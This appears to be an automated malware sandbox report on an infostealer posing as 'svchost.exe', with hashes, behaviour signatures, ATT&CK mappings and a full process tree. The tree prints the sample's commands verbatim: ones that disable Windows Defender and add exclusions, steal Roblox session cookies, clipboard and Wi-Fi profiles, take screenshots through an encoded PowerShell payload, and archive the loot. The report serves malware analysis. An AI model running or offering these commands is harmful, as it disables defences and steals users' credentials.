Analysis

  • max time kernel
    93s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-04-2024 19:20

General

  • Target

    svchost.exe

  • Size

    7.4MB

  • MD5

    1030476a7ef8cb5c29c16902a1caa8e3

  • SHA1

    6811a40c61e1cf6d07ef04573c9bd11ad76f4e34

  • SHA256

    1a8cce0b3c824a7b538c386d8b95f573206f32fc10be4a33bb4c2a0ae72e70b4

  • SHA512

    f15b4b3bfa5a55c5df2ee3839ccd0f2e9a2272760ae990f2377c0b6eb8c7dc0c2d476529e82193788033dab5c30c6c1460eeb3f013addf4de9b3e62410fba02d

  • SSDEEP

    196608:Trno0cDenLjv+bhqNVoBKUh8mz4Iv9Plu1D7A3:JieLL+9qz8/b4IzuRA3

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3576
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4420
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4664
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3012
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1756
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:4596
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3520
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:752
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3188
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2376
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\muf5eugg\muf5eugg.cmdline"
                5⤵
                  PID:392
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A76.tmp" "c:\Users\Admin\AppData\Local\Temp\muf5eugg\CSCF33353C8F0414742B7FAA7AE7B31F7F.TMP"
                    6⤵
                      PID:3884
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3592
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:5040
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1144
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3928
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2340
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4484
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2492
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:5028
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:3060
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:1972
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:3484
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2152
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:5108
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4660
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:2956
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:3288
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26442\rar.exe a -r -hp"44" "C:\Users\Admin\AppData\Local\Temp\lNuv3.zip" *"
                                      3⤵
                                        PID:528
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI26442\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI26442\rar.exe a -r -hp"44" "C:\Users\Admin\AppData\Local\Temp\lNuv3.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1772
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:1588
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1428
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:2892
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:2712
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:468
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:2668
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:2128
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4956
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:3484
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:3348
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:2220
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4660

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                  Credential Access

                                                  Unsecured Credentials

                                                  2
                                                  T1552

                                                  Credentials In Files

                                                  2
                                                  T1552.001

                                                  Discovery

                                                  System Information Discovery

                                                  3
                                                  T1082

                                                  Process Discovery

                                                  1
                                                  T1057

                                                  Collection

                                                  Data from Local System

                                                  2
                                                  T1005

                                                  Command and Control

                                                  Web Service

                                                  1
                                                  T1102

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                    Filesize

                                                    3KB

                                                    MD5

                                                    8740e7db6a0d290c198447b1f16d5281

                                                    SHA1

                                                    ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                    SHA256

                                                    f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                    SHA512

                                                    d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Filesize

                                                    944B

                                                    MD5

                                                    2e907f77659a6601fcc408274894da2e

                                                    SHA1

                                                    9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                    SHA256

                                                    385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                    SHA512

                                                    34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Filesize

                                                    944B

                                                    MD5

                                                    59d97011e091004eaffb9816aa0b9abd

                                                    SHA1

                                                    1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                    SHA256

                                                    18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                                    SHA512

                                                    d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Filesize

                                                    1KB

                                                    MD5

                                                    bf7b73e38e4a79c2a863a0c331e2000e

                                                    SHA1

                                                    8086254ce77c67e94b9c1380e3f502523399ab9e

                                                    SHA256

                                                    669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0

                                                    SHA512

                                                    a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Filesize

                                                    1KB

                                                    MD5

                                                    b2600662b39ee59512f530131c038b45

                                                    SHA1

                                                    c417eecbd7fd9c0f143261279c17cdc83783c95c

                                                    SHA256
